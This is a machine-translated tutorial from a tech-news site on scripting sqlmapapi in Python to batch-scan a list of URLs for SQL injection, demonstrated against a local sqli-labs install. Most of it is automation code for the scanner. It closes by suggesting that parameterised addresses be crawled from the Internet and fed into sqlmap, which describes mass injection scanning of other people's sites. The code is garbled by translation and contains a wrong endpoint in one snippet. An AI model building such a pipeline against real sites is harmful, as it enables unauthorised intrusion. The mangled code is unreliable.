Shulou(Shulou.com)06/01 Report--

This article mainly introduces "how to use sqlmapapi batch testing". In daily operation, I believe many people have doubts about how to use sqlmapapi batch testing. The editor consulted all kinds of data and sorted out simple and easy-to-use operation methods. I hope it will be helpful for you to answer the doubts about "how to use sqlmapapi batch testing". Next, please follow the editor to study!

Get sqlmapapi interface information

Python.exe sqlmapapi.py-s

Develop the current project process (use sqlmapapi interface to realize batch url injection security detection

1 create a new task record task ID @ get ("/ task/new")

2 set task ID scan information @ post ("/ option//set")

3 start scanning the corresponding ID task @ post ("/ scan//start")

4 read the scan status judgment result @ get ("/ scan//status")

5 if you finish deleting ID and get the result @ get ("/ task//delete")

6 scan results view @ get ("/ scan//data)

Import requestsimport json# creation task IDtask_new_rul=' http://127.0.0.1:8775/task/new'resp = requests.get (task_new_rul) print (resp.json () ['taskid'])

Return the result to get ID (the ID value is different each time)

Locally built sqllabs for url

# set the configuration information of task ID (scan information) data = {'url':' http://127.0.0.1/sqlilabs/Less-2/?id=1'}headers={' Content-Type':'application/json'} task_set_url = 'http://127.0.0.1:8775/option/'+task_id+'/set'print(task_set_url)task_set_resp=requests.post(task_set_url,data=json.dumps(data), Headers=headers) # print (task_set_resp.content.decode ('utf-8'))

Return the result:

Http://127.0.0.1:8775/option/895795f56c98f534/set

# start the scan task corresponding to ID task_start_url = 'http://127.0.0.1:8775/scan/'+task_id+'/start'task_start_resp=requests.post(task_set_url,data=json.dumps(data),headers=headers)print(task_start_resp.content.decode('utf-8'))

The returned result is true

# obtain the scan status of the corresponding ID task_status_url=' http://127.0.0.1:8775/scan/'+task_id+'/status'task_status_resp=requests.get(task_status_url)print(task_status_resp.content.decode('utf-8'))

If there is a problem, the ID value will change every time you run it, and the state will always be running.

Improve the code if the decision condition

Batch url to be tested can be added to 1.txt.

Import requestsimport jsonimport timedef sqlmapapi (url): data = {'url': url} headers = {' Content-Type': 'application/json'} task_new_rul =' http://127.0.0.1:8775/task/new' resp = requests.get (task_new_rul) task_id = resp.json () ['taskid'] if' success' in resp.content.decode ( 'utf-8'): print (' sqlmapapi task create clients') Task_set_url = 'http://127.0.0.1:8775/option/' + task_id +' / set' task_set_resp = requests.post (task_set_url, data=json.dumps (data), headers=headers) if 'success' in task_set_resp.content.decode (' utf-8'): print ('sqlmapapi task set clients') Task_start_url = 'http://127.0.0.1:8775/scan/' + task_id +' / start' task_start_resp = requests.post (task_start_url, data=json.dumps (data), headers=headers) if 'success' in task_start_resp.content.decode (' utf-8'): print ('sqlmapapi start clients') While 1: task_status_url = 'http://127.0.0.1:8775/scan/' + task_id +' / status' task_status_resp = requests.get (task_status_url) if 'running' in task_status_resp.content.decode (' utf-8'): print ('sqlmapapi) Taskid scan running') pass else: task_data_url=' http://127.0.0.1:8775/scan/' + task_id +'/ data' task_data_resp= requests.get (task_data_url) print (task_data_resp. Content.decode ('utf-8') break time.sleep (3) if _ _ name__ = =' _ main__': for url in open ('1.txt'): url = url.replace ('\ n') '') sqlmapapi (url)

In fact, it can be more perfect, such as exporting the test results to a file, so that the addresses with parameters can be crawled from the Internet and imported into sqlmap for testing.

At this point, the study on "how to use sqlmapapi batch testing" is over. I hope to be able to solve your doubts. The collocation of theory and practice can better help you learn, go and try it! If you want to continue to learn more related knowledge, please continue to follow the website, the editor will continue to work hard to bring you more practical articles!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.